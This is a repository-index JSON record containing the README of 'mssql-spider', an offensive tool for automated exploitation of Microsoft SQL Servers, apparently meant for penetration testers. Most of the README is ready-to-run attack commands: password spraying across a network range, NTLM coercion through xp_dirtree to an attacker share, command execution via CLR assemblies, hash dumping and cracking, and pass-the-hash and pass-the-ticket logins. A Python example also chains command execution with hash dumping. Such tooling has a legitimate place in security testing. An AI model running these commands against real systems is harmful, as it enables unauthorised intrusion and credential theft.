{"id":15002612,"url":"https://github.com/dadevel/mssql-spider","last_synced_at":"2025-04-06T04:11:31.635Z","repository":{"id":133485498,"uuid":"599256577","full_name":"dadevel/mssql-spider","owner":"dadevel","description":"Automated exploitation of MSSQL servers at scale","archived":false,"fork":false,"pushed_at":"2025-03-29T08:27:31.000Z","size":436,"stargazers_count":107,"open_issues_count":0,"forks_count":8,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-30T03:05:52.263Z","etag":null,"topics":["adsecurity","mssql","offsec"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dadevel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-02-08T19:16:14.000Z","updated_at":"2025-03-29T08:27:29.000Z","dependencies_parsed_at":"2023-11-16T07:32:12.836Z","dependency_job_id":"6b4adace-7d4e-4331-8db6-c73cf524ef29","html_url":"https://github.com/dadevel/mssql-spider","commit_stats":{"total_commits":63,"total_committers":3,"mean_commits":21.0,"dds":0.4285714285714286,"last_synced_commit":"65c50088fc469f82a70cbbb757a0a52caffcba8d"},"previous_names":[],"tags_count":16,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dadevel%2Fmssql-spider/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dadevel","download_url":"https://codeload.github.com/dadevel/mssql-spider/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247430871,"owners_count":20937874,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["adsecurity","mssql","offsec"],"created_at":"2024-09-24T18:51:30.954Z","updated_at":"2025-04-06T04:11:31.614Z","avatar_url":"https://github.com/dadevel.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# mssql-spider\n\n![Screenshot](./assets/demo.png)\n\nAn improved [impacket-mssqlclient](https://github.com/fortra/impacket/blob/master/examples/mssqlclient.py) that discovers and exploits as many Microsoft SQL Servers as it can reach by crawling linked instances and abusing user impersonation.\nFor example, it can solve the [OSEP](https://www.offensive-security.com/pen300-osep/) Lab Challenge 2 automatically.\n\nBig thanks to the developers of fortra/impacket#1397, [SQLRecon](https://github.com/xforcered/SQLRecon) and [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) on which this project is based.\n\n# Setup\n\na) With [pipx](https://github.com/pypa/pipx).\n\n~~~ bash\npipx install git+https://github.com/dadevel/mssql-spider.git@main\n~~~\n\nb) With [pip](https://github.com/pypa/pip).\n\n~~~ bash\npip install --user git+https://github.com/dadevel/mssql-spider.git@main\n~~~\n\nIf you want the latest features, replace `@main` with `@dev`.\n\n# Usage\n\nStarting from just network access without credentials (classic network pentest), spray known default passwords, abuse user impersonation or linked instances to reach additional servers and execute `whoami` on all servers where you gained *sysadmin* access:\n\n~~~ bash\nmapcidr -cidr 192.168.178.0/24 | mssql-ping | tee ./instances.json | mssql-spray passwords -c ./assets/default-credentials.txt | tee ./logins.json | mssql-spider -x 'whoami /all'\n~~~\n\nStarting with domain credentials, fetch SPNs of MSSQL servers from BloodHound's database and coerce NTLM authentication from all reachable servers with `xp_dirtree`.\nThis does not require privileged access.\n\n~~~ bash\nmssql-discover bloodhound | mssql-ping | tee ./instances.json | mssql-spider -d corp.local -u jdoe -p 'passw0rd' --sysinfo -c '\\\\192.168.178.128\\harvest'\n~~~\n\nAll commands switch to JSON input or output if they are used as part of a pipeline.\nYou can override this behavior with `--no-json-input` / `--no-json-output`.\n\n## Advanced Features\n\nLoad and execute a .NET assembly as *sysadmin*.\nThe first argument is the path to the DLL.\nThe second argument is the name of the function to call.\nAll following arguments are passed to the function as `SqlString`.\nThe C# code for an example DLL can be found at [SharpProcedure.cs](./extras/SharpProcedure.cs).\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local --exec-clr ./SharpProcedure.dll Run cmd.exe '/c echo %USERNAME%'\n~~~\n\nDump secrets and crack password hashes of database logins with [hashcat](https://github.com/hashcat/hashcat).\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local --dump-hashes ./hashes.txt --dump-jobs --dump-autologon\nhashcat -O -w 3 -a 0 -m 1731 --username ./hashes.txt ./rockyou.txt\n~~~\n\nPost-process the JSON output with `jq`.\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local -x 'whoami /priv' | jq -r 'select(.pwned==true and .result!=null)'\n~~~\n\n## Authentication\n\nAs local database user.\n\n~~~ bash\nmssql-spider -u sa -p 'passw0rd' -t db01.corp.local\n~~~\n\nAs local Windows user.\n\n~~~ bash\nmssql-spider -w -u administrator -p 'passw0rd' -t db01.corp.local\n~~~\n\nAs domain user via NTLM and a password.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -p 'passw0rd' -t db01.corp.local\n~~~\n\nAs domain user via NTLM *Pass the Hash*.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -H b9f917853e3dbf6e6831ecce60725930 -t db01.corp.local\n~~~\n\nAs domain user via Kerberos *Overpass the Key*.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -H b9f917853e3dbf6e6831ecce60725930 -k -t db01.corp.local\n~~~\n\nAs domain user via Kerberos *Pass the Key*.\n\n~~~ bash\nmssql-spider -d corp.local -u jdoe -a c4c283276339e2d6b390eb5a11d419c9 -k -t db01.corp.local\n~~~\n\nAs domain user via Kerberos *Pass the Ticket*.\n\n~~~ bash\nexport KRB5CCNAME=./jdoe.ccache\nmssql-spider -k -t db01.corp.local\n~~~\n\n# Library Usage\n\n~~~ python\nfrom mssqlmap.client import Client\nfrom mssqlmap.connection import Connection\nfrom mssqlmap.modules.dump import HashDumper\nfrom mssqlmap.modules.exec import CmdShellExecutor\nfrom mssqlmap.modules.impersonated_user import ImpersonationSpider\nfrom mssqlmap.modules.linked_instance import LinkSpider\n\nwith Client(Connection(host='db01.corp.local', username='sa', password='passw0rd')) as client:\n    for child, module, status in client.spider([ImpersonationSpider(), LinkSpider()]):\n        print(child, module, status)\n        if status in ('failed', 'denied', 'repeated'):\n            continue\n        for module, result in child.invoke([CmdShellExecutor('whoami /all'), HashDumper('./hashes.txt')]):\n            print(child, module, result)\n~~~\n\n# Prevention and Detection\n\nSee [github.com/skahwah/sqlrecon/wiki](https://github.com/xforcered/SQLRecon/wiki/8.-Prevention,-Detection-and-Mitigation-Guidance).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fmssql-spider","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdadevel%2Fmssql-spider","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdadevel%2Fmssql-spider/lists"}